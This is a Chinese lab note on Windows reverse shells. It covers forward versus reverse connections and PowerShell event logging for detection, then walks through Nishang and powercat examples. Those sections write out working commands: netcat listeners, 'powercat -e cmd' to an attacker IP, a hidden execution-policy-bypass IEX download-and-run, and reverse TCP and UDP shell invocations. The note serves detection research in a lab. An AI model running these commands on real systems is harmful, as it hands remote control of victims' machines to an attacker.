[笔记]Windows安全之《一》反弹Shell

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: Windows安全之《一》反弹Shell

powershell反弹shell常见方式

反弹Shell原理及检测技术研究


文章目录



   一. 正向连接和反向连接(反弹连接)

       1.1. 正向连接

       1.2. 反向连接(反弹连接)

   二、关于Windows上powershell的配置

       2.1. 开启 PowerShell 日志记录

       2.2. 开启日志订阅机制

       2.3. 启动powershell执行ps脚本

       三、反弹Shell原理

   四. 反弹Shell 实例运行

       4.1. 实例1 Invoke-PowerShellTcp.ps1 运行反弹TCP Shell

           4.1.1. 前期准备

           4.1.2. 基本思路及实现效果

       4.2. 实例2 powercat.ps1运行反弹TCP shell

           4.2.1. 前期准备

           4.2.2. 基本思路和实现效果

       4.3. 实例3 Invoke-PowerShellUdp.ps1运行反弹Udp shell

       4.4. 实例4 使用nishang框架运行反弹Http shell

           4.4.1. 前期准备

           4.4.2. 过程

       4.5. 实例5 反弹ICMPShell

   五.关于windows反弹Shell疑问

       5.1. 多次反弹无法捕获?

       5.2. 目前只支持tcp?

       5.3. 为什么是powershell?


一. 正向连接和反向连接(反弹连接)



1.1. 正向连接


图片.png


正向连接:我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。


主动连接

控制端,即客户端

被控制端,即服务端

在以下情况,正向连接会不能用:


   某客户机中了你的网马,但是它在局域网内,你直接连接不了。

   目标机器的ip动态改变,你不能持续控制。

   由于防火墙等限制,对方机器只能发送请求,不能接收请求。

   对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的。


所以建立一个服务端让恶意程序主动连接,才是上策。


1.2. 反向连接(反弹连接)


图片.png


反弹连接:攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。


主动连接

被控制端,即客户端

控制端,服务端


二、关于Windows上powershell的配置



2.1. 开启 PowerShell 日志记录


cmd运行gpedit.msc打开本地组策略


2.2. 开启日志订阅机制


cmd运行eventvwr.exe打开系统事件日志

应用程序和服务日志->Microsoft->Windows->PowerShell/Operational 产生的 4103 事件日志

4103事件日志 主要记录powershell的操作日志,agent检测也是通过过滤日志信息来判断反弹shell


2.3. 启动powershell执行ps脚本


powershell 设置执行策略:

set-executionpolicy remotesigned

powershell 查看当前执行策略是否为RemoteSigned,是则设置策略成功

get-executionpolicy

右击powershell脚本文件,选中解除锁定,并应用


即可执行Invoke-PowerShellTcp.ps1脚本不报错了


三、反弹Shell原理



最本质的原理:就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,建立连接 然后攻击端跟受害者主机通信,受害者主机转发shell输入输出流到攻击端,从而攻击端能够控制受害者主机。


主要区别:在于通信的原理(TCP/UDP/ICMP/HTTP/SSH/TELNET),也可以形容反弹Shell的类型 例如反弹TCP的Shell;


建立通信的方式(执行ps脚本/注入DLL/打开office文件)的方式,分为以下几类:


   受害主机执行基于PowerShell的一类(TCP、UDP、ICMP、Http、SSH隧道、注入DLL)

   受害主机打开office的一类(Empire 结合office反弹shell、利用office OLE对象插入bat文件反弹shell)


从检测的角度,可以将反弹Shell分为以下三种类型:


   第一类反弹Shell:直接重定向Shell的输入输出到Socket

   第二类反弹Shell:通过管道、伪终端等中转,再重定向Shell的输入输出到中转

   第三类反弹Shell:编程语言实现标准输入中转,重定向命令执行的输入到中转


四. 反弹Shell 实例运行



4.1. 实例1 Invoke-PowerShellTcp.ps1 运行反弹TCP Shell


以win10为被控端/受攻击端,kali为控制端/攻击端为例:


4.1.1. 前期准备


完成3.3的powershell的配置

netcat下载安装(被控端和控制端都需要安装)

下载地址:https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip

下载nishang框架:https://github.com/samratashok/nishang


4.1.2. 基本思路及实现效果


创建一个控制端(用VM安装一个Kali或者其他版本Linux安装netcat,Kali自带netcat)运行命令 监听端口9000 等待被控制端主动连接

nc -lvp 9000

被控制端运行Invoke-PowerShellTcp.ps1脚本 默认连接控制端的9000端口


Invoke-PowerShellTcp.ps1 -Reverse -IPAddress 控制端的IP -port 9000


控制端进入交互界面


说明连接成功 控制端可以进行各种控制操作了。


4.2. 实例2 powercat.ps1运行反弹TCP shell


以win10为被控端/受攻击端,kali为控制端/攻击端为例


4.2.1. 前期准备


下载powercat:https://github.com/besimorhino/powercat


这里环境编写Powershell环境 建议vscode+powershell插件


注意:下载脚本运行是没效果的,需要以下操作步骤才能正常使用powercat:


   导入模块 Import-Module .\powercat.ps1

   设置本地脚本执行策略 不验证签名


Set-ExecutionPolicy RemoteSigned


然后就可以正常使用powercat了。


(其他基于powershell的框架基本都是如此)


注意:似乎每次都需要Import-Module脚本才能正常运行脚本


4.2.2. 基本思路和实现效果


同理,如上思路基本相似。


1.攻击端监听一个端口,等待被攻击端主动连接。nc -nlvp 9000


2.被攻击端powershell执行。

powercat -c 192.168.111.132 -p 9000 -e cmd

以下是不下载Powercat的命令

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1");powercat -c 192.168.111.132 -p 9000 -e cmd

两个命令主要区别在于脚本是否在本地:


   第一个Powercat脚本在本地并且已经安装成了模块


   第二个需要先使用Powershell下载脚本,在执行.


3.效果同上


4.3. 实例3 Invoke-PowerShellUdp.ps1运行反弹Udp shell


攻击端:


监听UDP9000端口

nc -lup 9000

受害端:


进入当前脚本文件夹

Import-Module .\Invoke-PowerShellUdp.ps1
Invoke-PowerShellUdp -Reverse -IPAddress 攻击端IP地址 -port 9000

4.4. 实例4 使用nishang框架运行反弹Http shell


nishang框架的官方教程:https://github.com/samratashok/nishang


参考https://zhuanlan.zhihu.com/p/27723026


4.4.1. 前期准备


攻击端和受害端均为Windows,且此处受害端为http服务端,攻击端为http客户端;


4.4.2. 过程


受害端:


导入Invoke-PoshRatHttp.ps1

Import-Module .\Invoke-PoshRatHttp.ps1# 监听端口,启动http服务
Invoke-PoshRatHttp -IPAddress 192.168.111.132 -Port 9000

输出结果.


最后一行便是给攻击端使用的


攻击端:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.111.132:9000/connect'))
>>whoami


便能控制受害端.不过http是短链接 请求返回结果之后就结束了,每次命令都需要重新请求.


4.5. 实例5 反弹ICMPShell


参考


https://blog.csdn.net/qq_39101049/article/details/96191861


https://blog.csdn.net/qq_45625605/article/details/103056458


五.关于windows反弹Shell疑问



5.1. 多次反弹无法捕获?


agent 如果是同一进程反弹 是不会重复上报的


5.2. 目前只支持tcp?


非也非也,只需要支持powershell即可,其他dns,http的脚本都是依托powershell运行,所以只需要解决powershell异常连接监听即可。


5.3. 为什么是powershell?


问题:powershell win7之后才出现,为什么cmd不能呢?


解答:


1.cmd本身是调用已存在的exe,例如ping ipconfig。对于网络请求cmd没有支持的。而powershell是基于.net4.5的 面向对象 有许多模块可以马上直接使用,比如网络相关


2.反弹shell原理是基于被控制端主动连接 控制端,所以被控制端的环境依赖越少越好。Powershell window都有,而且其他需要py,office的对环境和其他条件的限制太大。

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
相关文章
|
7天前
|
存储 安全 网络安全
Windows Server 本地安全策略
由于广泛使用及历史上存在的漏洞,Windows服务器成为黑客和恶意行为者的主要攻击目标。这些系统通常存储敏感数据并支持关键服务,因此组织需优先缓解风险,保障业务的完整性和连续性。常见的威胁包括勒索软件、拒绝服务攻击、内部威胁、恶意软件感染等。本地安全策略是Windows操作系统中用于管理计算机本地安全性设置的工具,主要包括用户账户策略、安全选项、安全设置等。实施强大的安全措施,如定期补丁更新、网络分段、入侵检测系统、数据加密等,对于加固Windows服务器至关重要。
|
1月前
|
监控 Ubuntu Linux
视频监控笔记(五):Ubuntu和windows时区同步问题-your clock is behind
这篇文章介绍了如何在Ubuntu和Windows系统中通过设置相同的时区并使用ntp服务来解决时间同步问题。
64 4
视频监控笔记(五):Ubuntu和windows时区同步问题-your clock is behind
|
1月前
|
Shell Linux Windows
Does windows have a shell layer?
Does windows have a shell layer?
|
1月前
|
缓存 安全 网络协议
Windows 安全基础——NetBIOS篇
Windows 安全基础——NetBIOS篇
|
4月前
|
云安全 安全 网络安全
Windows安全:构建稳固的防线,守护数字世界
随着数据保护法规的不断加强,Windows系统需要更好地满足法规遵从和合规性要求。未来,Windows系统将更加注重用户隐私保护和数据安全合规性方面的功能提升
150 54
|
3月前
|
API C# Shell
WPF与Windows Shell完美融合:深入解析文件系统操作技巧——从基本文件管理到高级Shell功能调用,全面掌握WPF中的文件处理艺术
【8月更文挑战第31天】Windows Presentation Foundation (WPF) 是 .NET Framework 的关键组件,用于构建 Windows 桌面应用程序。WPF 提供了丰富的功能来创建美观且功能强大的用户界面。本文通过问题解答的形式,探讨了如何在 WPF 应用中集成 Windows Shell 功能,并通过具体示例代码展示了文件系统的操作方法,包括列出目录下的所有文件、创建和删除文件、移动和复制文件以及打开文件夹或文件等。
76 0
|
4月前
|
Linux Apache C++
FFmpeg开发笔记(三十五)Windows环境给FFmpeg集成libsrt
该文介绍了如何在Windows环境下为FFmpeg集成SRT协议支持库libsrt。首先,需要安装Perl和Nasm,然后编译OpenSSL。接着,下载libsrt源码并使用CMake配置,生成VS工程并编译生成srt.dll和srt.lib。最后,将编译出的库文件和头文件按照特定目录结构放置,并更新环境变量,重新配置启用libsrt的FFmpeg并进行编译安装。该过程有助于优化直播推流的性能,减少卡顿问题。
118 2
FFmpeg开发笔记(三十五)Windows环境给FFmpeg集成libsrt
|
3月前
|
安全 数据安全/隐私保护 Windows
Windows安全策略
Windows安全策略
54 0
|
4月前
|
存储 安全 数据安全/隐私保护
Windows 32 汇编笔记(一):基础知识
Windows 32 汇编笔记(一):基础知识
|
3月前
|
存储 编译器 Linux
Windows 32 汇编笔记(二):使用 MASM
Windows 32 汇编笔记(二):使用 MASM